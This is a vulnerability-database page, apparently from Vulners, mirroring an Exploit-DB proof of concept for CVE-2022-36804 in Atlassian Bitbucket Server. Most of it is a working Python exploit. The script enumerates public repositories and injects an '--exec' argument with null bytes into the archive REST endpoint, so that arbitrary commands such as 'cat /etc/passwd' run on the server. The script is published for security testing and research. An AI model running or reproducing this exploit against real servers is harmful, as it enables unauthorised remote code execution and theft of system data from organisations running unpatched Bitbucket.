Lucene search

K

Bitbucket v7.0.0 - RCE

πŸ—“οΈΒ 23 Mar 2023Β 00:00:00Reported byΒ khal4n1TypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 129Β Views

Exploit for Atlassian Bitbucket v7.0.0 - Remote Code Execution (RCE) CVE-2022-3680

Show more
Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Command Injection in Atlassian Bitbucket
19 Sep 202212:46
–githubexploit
GithubExploit
Exploit for CVE-2022-36804
23 Jan 202312:51
–githubexploit
GithubExploit
Exploit for CVE-2022-36804
26 Sep 202208:35
–githubexploit
GithubExploit
Exploit for CVE-2022-36804
25 Sep 202213:16
–githubexploit
GithubExploit
Exploit for CVE-2022-36804
23 Sep 202211:05
–githubexploit
GithubExploit
Exploit for CVE-2022-36804
24 Sep 202205:04
–githubexploit
GithubExploit
Exploit for CVE-2022-36804
7 Sep 202209:35
–githubexploit
GithubExploit
Exploit for CVE-2022-36804
19 Sep 202213:15
–githubexploit
GithubExploit
Exploit for Command Injection in Atlassian Bitbucket
20 Sep 202210:41
–githubexploit
GithubExploit
Exploit for Command Injection in Atlassian Bitbucket
23 Sep 202208:43
–githubexploit
Rows per page
# Exploit Title: Bitbucket v7.0.0 -  RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804

#****************************************************************#
#The following exploit is used to exploit a vulnerability present
#Atlassian Bitbucket Server and Data Center 7.0.0 before version
#7.6.17, from version 7.7.0 before version 7.17.10, from version
#7.18.0 before version 7.21.4, from version 8.0.0 before version
#8.0.3, from version 8.1.0 before version 8.1.3, and from version
#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1

#Usage Example

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'

#The server will send a 500 http response with the stout output from the
# command  executed.


#****************************************************************#

#!/usr/bin/python3

import argparse
import urllib
from urllib import request
import re

#argument setup
parser = argparse.ArgumentParser(description='Program to test
bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack.
[REQUIRED]", required=True )
parser.add_argument("--cmd", help="Set the command to execute.
[DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd= urllib.parse.quote(args.cmd)


#reads from the public repository what is available
requ = request.urlopen(args.url+ "/repos?visibility=public")
response = requ.read()

#select a public project and stores it in a variable
project = re.findall('7990/projects/(.*)/repos/',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]

#Selects a public repo and stores it in a vatiable
file = re.findall('/repos/(.*)/browse',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]

# Exploitation
try :
        attack = request.urlopen(args.url +
"/rest/api/latest/projects/" + project + "/repos/" + file +
"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
        print (attack.response())
except urllib.error.HTTPError as e:
        body = e.read().decode()  # Read the body of the error response
        print (body)

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Mar 2023 00:00Current
9.0High risk
Vulners AI Score9.0
CVSS38.8
EPSS0.973
129
.json
Report